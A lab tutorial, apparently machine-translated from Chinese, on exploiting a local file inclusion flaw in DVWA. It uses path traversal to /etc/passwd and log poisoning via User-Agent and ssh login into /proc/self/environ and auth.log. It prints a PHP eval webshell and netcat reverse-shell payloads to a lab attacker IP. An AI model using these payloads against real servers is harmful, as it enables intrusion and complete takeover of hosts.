File contained log poisoning (user agent)

Catalog

One 、 The local file contains

Two 、 Log poisoning

Get a bounce shell Gain full control of the target server

Method 1 ：

Method 2 ：/var/log/auth.log

One 、 The local file contains

　　 Local File Inclusion Vulnerability refers to the inclusion of local php file , And by PHP The file contains a vulnerability to invade the website , You can browse all files on the same server , And get webshell.

See ?page= Iconic injection point , Prompt us to enter ?=page=index.php

Through error reporting , We can know that the directory path contained in the current file is /var/www/dvwa/vulnerabilities/fi/

We can go through ../../../../../etc/passwd Try to see if you can display the default user account password

Find access to . Therefore, there is a local File Inclusion Vulnerability (LFI), You can access some passwords in this way 、 Sensitive information files .

Two 、 Log poisoning

How to use it LFI Vulnerabilities get bounced shell, Fully control the target host ？

　　 By injecting malicious code into readable files , Then browse it so that malicious code can be executed , such as

　　/proc/self/environ

　　/var/log/auth.log

　　/var/log/apache2/access.log

　　 Log files are usually used to complete , Because local files are usually registered or written to log files .

Take a chestnut ：

　　 open burpsuite, Open agent . The browser accesses the following url Grab http package

　　http://192.168.164.129/dvwa/vulnerabilities/fi/?page=../../../../../proc/self/environ

It is found that the agent will execute , Let's change the package to php Try forwarding the code . 

Modified to complete , Try forwarding the results ： 

You can find php The code is executed . So we can put payload Switch to webshell.php Medium php Code to get webshell.

For example, inject a sentence into the Trojan horse

<?php @eval($_POST['pass']);?>

And then connect through the ant sword .

Get a bounce shell Gain full control of the target server

Method 1 ：

Another way this time , Upload the article from the file and know passthru("") The function is PHP Executing system commands , Use here netcat Execute the command of listening port

structure payload by <?passthru("nc -e /bin/sh 192.168.164.128 8888");?>

And then in kali Turn on Monitor .

Forward The result of the modified package is as follows ：

Successful control of target host . 

Method 2 ：/var/log/auth.log

　　 Access log files

　　 Find out 22 The port is open , We can try to use ssh Log in to see if it will be recorded in the log file  

With random Account login , Just type in the password . Then refresh the browser page to find random, It is found that the log file has been recorded . 

This explanation ,ssh The following command is executed , We just need to replace the command with rebound shell Of payload Just ok 了 .

structure payload by <?passthru('nc -e /bin/sh 192.168.164.128 8888');?>

Turn on monitoring , meanwhile ssh Log in .

The command here needs to be base64 code , The coding results are as follows ： 

Last ssh Enter , Refresh browser page , Execute the injection command shell Connect to the attack host . 

Successful control of target host .